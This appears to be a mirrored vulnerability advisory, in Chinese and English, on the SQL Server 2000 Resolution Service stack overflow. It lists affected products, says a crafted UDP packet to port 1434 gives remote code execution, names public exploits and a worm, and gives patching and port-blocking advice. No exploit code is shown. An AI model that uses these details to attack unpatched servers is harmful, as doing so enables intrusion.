- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
Microsoft SQL Server 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0
Microsoft Data Engine 2000
+ Akiva WebBoard 6.1
+ BindView bv-Admin for Microsoft Exchange
+ BindView bv-Admin for Windows 7.0
+ BindView bv-Admin for Windows Migration
+ BindView bv-control for Active Directory 7.0.2
+ BindView bv-Control for Internet Security 7.0.1
+ BindView bv-Control for Microsoft Exchange 7.0
+ BindView bv-Control for Microsoft SQL Server 7.0.1
+ BindView bv-Control for Microsoft SQL Server 7.0
+ BindView bv-Control for Windows 7.0.2
+ CARI-RUSCO Secure Perfect 3.0
+ CCH Equity Compliance Insider Reporting Module
+ Collins Medical Plus 2000
+ Computer Associates Unicenter
+ Computer Associates Unicenter RC/Update 6.1
+ Computer Associates Unicenter RC/Update 6.0
+ CSIRO BioLink Software 1.5
+ DATA.TXT Corporation Time Matters 4.0
+ DATA.TXT Corporation Time Matters 3.0
+ Dell OpenManage IT Assistant 6.0
+ Dell OpenManage IT Assistant 5.0
+ Express Metrix Express Software Manager 6.0.2
+ Express Metrix Express Software Manager 6.0.1
+ Express Metrix Express Software Manager 6.0
+ Express Metrix Express Software Manager 5.0
+ Fluke Networks Optiview Network Inspector 5.0
+ HP Openview Internet Services 4.5
+ HP Openview Internet Services 4.0
+ HP Openview Operations for Windows 7.1
+ HP Openview Operations for Windows 7.0
+ HP Openview Operations for Windows 6.0
+ HP Openview Reporter 3.0
+ HP Openview Reporter 2.0.2
+ ISI Infortel for Windows 5.4
+ ISI Infortel for Windows 5.2
+ ISI Infortel for Windows 5.1
+ ISI Infortel for Windows 4.0
+ Journyx Timesheet 5.0
+ Journyx Timesheet 4.6
+ Journyx Timesheet 4.5 m3
+ Journyx Timesheet 4.5 m2
+ Journyx Timesheet 4.5
+ Journyx Timesheet 2.0
+ Microsoft .NET Framework 1.1
+ Microsoft .NET Framework 1.0 SP1
+ Microsoft .NET Framework 1.0
+ Microsoft .NET Framework SDK 1.0
+ Microsoft Application Center 2000
+ Microsoft Biztalk Server 2002 Partner Edition 0
+ Microsoft FrontPage 2000 Server Extensions SR 1.3
+ Microsoft FrontPage 2000 Server Extensions SR 1.2
+ Microsoft FrontPage 2000 Server Extensions SR 1.1
+ Microsoft FrontPage 2000 Server Extensions SR 1.0
+ Microsoft Great Plains 5.5.1
+ Microsoft Great Plains 7.0
+ Microsoft Great Plains 5.5
+ Microsoft Great Plains 5.0
+ Microsoft Office 2000 SP2
+ Microsoft Office 2000 SP1
+ Microsoft Office 2000
+ Microsoft Office 2000 Chinese Version
+ Microsoft Office 2000 Japanese Version
+ Microsoft Office 2000 Korean Version
+ Microsoft Office XP SP1
+ Microsoft Office XP
+ Microsoft Office XP Developer Edition
+ Microsoft Project Central Server
+ Microsoft SharePoint Portal Server 2001 SP1
+ Microsoft SharePoint Portal Server 2001
+ Microsoft SharePoint Team Services from Microsoft
+ Microsoft SQL Server 2000 SP3
+ Microsoft SQL Server 2000 SP2
+ Microsoft SQL Server 2000 SP1
+ Microsoft SQL Server 2000
+ Microsoft Visio 2000 Enterprise Edition
+ Microsoft Visio Enterprise Network Tools
+ Microsoft Visual FoxPro 7.0 SP1
+ Microsoft Visual FoxPro 7.0
+ Microsoft Visual FoxPro 6.0
+ Microsoft Visual Studio .NET Academic Edition 0
+ Microsoft Visual Studio .NET Enterprise Architect Edition
+ Microsoft Visual Studio .NET Enterprise Developer Edition
+ Microsoft Visual Studio .NET Professional Edition
+ Microsoft Visual Studio .NET Trial Edition 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows XP Embedded SP1
+ Microsoft Windows XP Embedded
+ MIP NonProfit Series Pro 4.5
+ MIP NonProfit Series Pro 4.4
+ MIP NonProfit Series Pro 4.3
+ NetSupport NetSupport TCO 4.5.1
+ NetSupport NetSupport TCO 4.5
+ Network Associates SupportMagic SQL 4.5
+ Okena StormWatch
+ Peachtree Software Timeslips 11.0
+ Peachtree Software Timeslips 10.0
+ Peachtree Software Timeslips 9.0
+ Peachtree Software Timeslips 9.0
+ Peachtree Software Timeslips 8.0
+ Peachtree Software Timeslips 7.0
+ Peachtree Software Timeslips 6.0
+ QiNetix CommVault Galaxy 4.0.1
+ SalesLogix Corporation SalesLogix 2000.0
+ SmartMax Software MailMax 5.0
+ TeleStream FlipFactory 3.0
+ TeleStream FlipFactory 2.0
+ TeleStream FlipFactory 1.2
+ Veritas Software Backup Exec for Windows Servers 9.0
+ VIGILANTe SecureScan NX 2.5
+ Visionary Systems Firehouse Software 5.4
+ Visionary Systems Firehouse Software 5.0.2 5
+ Visionary Systems Firehouse Software 5.0
+ Visionary Systems Firehouse Software 3.0.5
+ Wonderware InTouch 7.11
+ Xerox CentreWare Web 1.0
Microsoft SQL Server 2000 SP3a
Microsoft SQL Server 2000 SP3

- 不受影响的程序版本

Microsoft SQL Server 2000 SP3a
Microsoft SQL Server 2000 SP3

- 漏洞讨论

A vulnerability has been discovered in Microsoft SQL Server 2000 that could make it possible for remote attackers to gain access to target hosts.

A problem in the SQL Server Resolution Service makes it possible for a remote user to execute arbitrary code on a vulnerable host. An attacker could exploit a stack-based overflow in the resolution service by sending a maliciously crafted UDP packet to port 1434.

It has been reported that a vulnerable version of MSDE 2000 is automatically installed with Internet Explorer 6 on .NET servers.


***UPDATE:

A worm that may exploit this vulnerability has been detected in the wild.

Administrators are advised to block all external access to database servers until more information is available. Access to TCP and UDP ports 1434 should be denied completely. Additionally, implementing filter rules for other ports may also decrease the chances of compromise through yet unknown avenues. This should be done even if the patch for this particular vulnerability has been installed.

Cisco has released an advisory that details workaround information. Microsoft recommends that affected users apply SQL Server 2000 Service Pack 3.

BlackBoard 5.5.1 Level 3 users can apply SQL Server 2000 Service Pack 3. Users are advised to contact BlackBoard for further information.

- 漏洞利用

An exploit has been released as part of the MetaSploit Framework 2.0.

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Exploit code available:

- 解决方案

Prior to installing the fixes, administrators are advised to ensure that all SQL Server processes are inactive. Ensure that all installations of SQL server are patched and reboot the system before restarting the SQL server.

Veritas Software Backup Exec 9.0 ships with some MSDE components and may therefore be prone to this vulnerability. Users are advised to apply the Microsoft fixes to address this vulnerability for Backup Exec.

Microsoft has released SQL Server 2000 SP3a, which contains all of the fixes from SP3. This service pack also allows users to disable netlibs so that SQL Server 2000 will not listen on port 1434. SP3a is directed at users who have not already installed SP3 or wish to disable the netlibs. Please see the SQL Server Homepage for further details.

A specific fix has been released for the Microsoft .NET Framework SDK. See the References section for a link to Microsoft Knowledge Base article 813850 for instructions and download information.

Fixes available:


Microsoft SQL Server 2000

Microsoft Data Engine 2000

Microsoft SQL Server 2000 SP1

Microsoft SQL Server 2000 Desktop Engine

Microsoft SQL Server 2000 SP2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站